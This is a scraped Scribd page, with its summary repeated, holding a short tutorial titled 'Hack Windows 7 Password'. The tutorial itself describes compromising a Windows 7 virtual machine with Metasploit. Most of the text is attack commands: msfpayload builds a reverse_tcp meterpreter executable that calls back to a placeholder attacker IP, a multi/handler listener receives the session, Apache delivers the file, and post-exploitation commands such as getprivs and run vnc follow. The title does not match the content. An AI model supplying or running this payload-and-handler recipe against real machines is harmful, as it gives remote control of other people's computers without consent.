0% found this document useful (0 votes)
18 views4 pages

Hack Windows 7 Password

This document provides 5 steps for hacking a Windows 7 virtual machine using Metasploit: 1) Boot the Windows 7 VM in VirtualBox, 2) Generate an exploit file using msfpayload to open a reverse TCP meterpreter session, 3) Start msfconsole and use the multi/handler exploit to receive the connection, 4) Make the exploit accessible via Apache and run it on the Windows 7 VM, 5) Get a meterpreter session and use commands like sysinfo, getprivs, and run vnc to interact with the compromised system.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
18 views4 pages

Hack Windows 7 Password

This document provides 5 steps for hacking a Windows 7 virtual machine using Metasploit: 1) Boot the Windows 7 VM in VirtualBox, 2) Generate an exploit file using msfpayload to open a reverse TCP meterpreter session, 3) Start msfconsole and use the multi/handler exploit to receive the connection, 4) Make the exploit accessible via Apache and run it on the Windows 7 VM, 5) Get a meterpreter session and use commands like sysinfo, getprivs, and run vnc to interact with the compromised system.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

Hacking Windows 7 using Metasploit

Step 1:
Boot Windows 7 in virtual Box:

Step 2:
Start a new Terminal and type the following command:
msfpayload windows/meterpreter/reverse_tcp lhost=<attacker's IP> lport=4444 x>exploit.exe

Step 3:
Start a new terminal and type "msfconsole". Now type following commands:

use exploit/multi/handler
set lhost <Attacker's IP>
set lport 4444
set payload windows/meterpreter/reverse_tcp
exploit

Step 4:
Open up windows 7 machine and run the exploit.exe which we created.
You can make your exploit accessible over the network using Apache server
Command to start apache service in Kali:
apache2ctl restart

Step 5:
Run the exploit...we will get a meterpreter session opened.
Type following commands:

sysinfo
getprivs
run vncetc

Enjoy

You might also like